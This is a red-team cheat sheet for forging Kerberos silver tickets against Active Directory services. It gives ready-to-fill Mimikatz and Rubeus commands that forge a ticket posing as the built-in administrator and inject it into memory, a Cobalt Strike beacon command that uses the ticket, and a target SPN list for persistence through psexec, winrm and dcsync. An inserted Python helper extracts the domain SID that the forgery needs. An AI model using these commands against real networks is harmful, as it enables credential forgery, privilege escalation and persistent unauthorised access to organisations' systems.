A silver ticket is a service ticket forged to grant privileges of the attacker's choosing. It requires knowledge of the service account's password or password hash (see Kerberoasting); for host persistence, the service will be CIFS/SMB, whose principal is the machine account. For more examples of how to use a silver ticket, see Kerberos Attack: Silver Ticket Edition.
Requirements
- Needs the security identifier of the domain
- Needs a service password or password hash
Target SPN for persistence method
- psexec: HOST or CIFS
- winrm: HOST or HTTP
- dcsync (DC only): LDAP
Mimikatz
To create a silver ticket via Mimikatz (ironic that the command is called golden):
kerberos::golden /user:ANY_DOMAIN_USER /domain:AD_DOMAIN /sid:DOMAIN_SID /target:TARGET_SPN_DOMAIN /service:TARGET_SPN_PROTOCOL /rc4:SERVICE_NTLM_HASH /ptt
- DOMAIN_SID is the SID of the domain. Run whoami /user to get the current domain user's SID, then remove the trailing -nnnn (the user's RID, where each n is a digit); what remains is the domain SID.
- /rc4: encrypt the service ticket with RC4 using the service account's NTLM password hash
- /ptt: inject the ticket into memory (pass-the-ticket)
This will create a ticket that mimics the local administrator (RID 500) on the server, with several high-privileged group memberships.
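The DOMAIN_SID step above relies on the structure of a domain account SID: S-1-5-21-<sub1>-<sub2>-<sub3>-<RID>, where everything before the last hyphen identifies the domain and the final component is the relative identifier (RID) of the principal. The following is an added example, not code from the original page or from Mimikatz or Rubeus; it parses constructed `whoami /user` output, splits off the RID of whatever length it has (so it also handles five-digit RIDs, which a fixed "strip the last -nnnn" rule would get wrong), and labels well-known RIDs such as 500, which is why the forged ticket above reads as the built-in Administrator. The sample output, the account name, and all SID values are constructed, and the function names are this example's own.

```python
import re
from typing import Tuple

# A domain account SID: S-1-5-21-<sub1>-<sub2>-<sub3>-<RID>.
# Group 1 captures the RID, which may be any number of digits.
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")

# Well-known RIDs worth recognising when reviewing who a ticket claims to be.
WELL_KNOWN_RIDS = {
    500: "Administrator (built-in)",
    512: "Domain Admins",
    513: "Domain Users",
    519: "Enterprise Admins",
}

# Constructed sample of `whoami /user` output (not captured from a real host);
# note the RID here is five digits long.
SAMPLE_WHOAMI = """USER INFORMATION
----------------

User Name       SID
=============== ==============================================
corp\\alice      S-1-5-21-1004336348-1177238915-682003330-12345
"""


def is_domain_account_sid(sid: str) -> bool:
    """True only for SIDs of the S-1-5-21-... domain form (not S-1-5-18 etc.)."""
    return SID_RE.match(sid.strip()) is not None


def split_sid(user_sid: str) -> Tuple[str, int]:
    """Return (domain_sid, rid) for a domain account SID, or raise ValueError."""
    sid = user_sid.strip()
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain account SID: {sid!r}")
    # Drop only the final hyphen-delimited component, whatever its length.
    domain_sid = sid.rsplit("-", 1)[0]
    return domain_sid, int(m.group(1))


def domain_sid_from_whoami(whoami_output: str) -> str:
    """Parse the tabular output of `whoami /user` and return the domain SID."""
    for line in whoami_output.splitlines():
        for token in line.split():
            if is_domain_account_sid(token):
                return split_sid(token)[0]
    raise ValueError("no domain account SID found in whoami output")


def describe_rid(rid: int) -> str:
    """Name a well-known RID, or say it is an ordinary account/group RID."""
    return WELL_KNOWN_RIDS.get(rid, "ordinary account or group RID")


if __name__ == "__main__":
    domain_sid = domain_sid_from_whoami(SAMPLE_WHOAMI)
    print("domain SID:", domain_sid)
    for rid in (500, 512, 12345):
        print(f"RID {rid}: {describe_rid(rid)}")
```

The regular expression deliberately rejects non-domain SIDs such as S-1-5-18 (LOCAL SYSTEM), so a machine-context `whoami /user` that does not carry a domain SID fails loudly instead of yielding a truncated, meaningless value.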
Rubeus
To create a silver ticket via Rubeus:
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:[target-spn]/[target-host-fqdn] /aes256:[machine-hash-aes256] /user:[target-user] /domain:[domain-fqdn] /sid:[domain-sid] /nowrap
To use a silver ticket:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[target-user] /password:[does-not-matter] /ticket:[ticket-b64]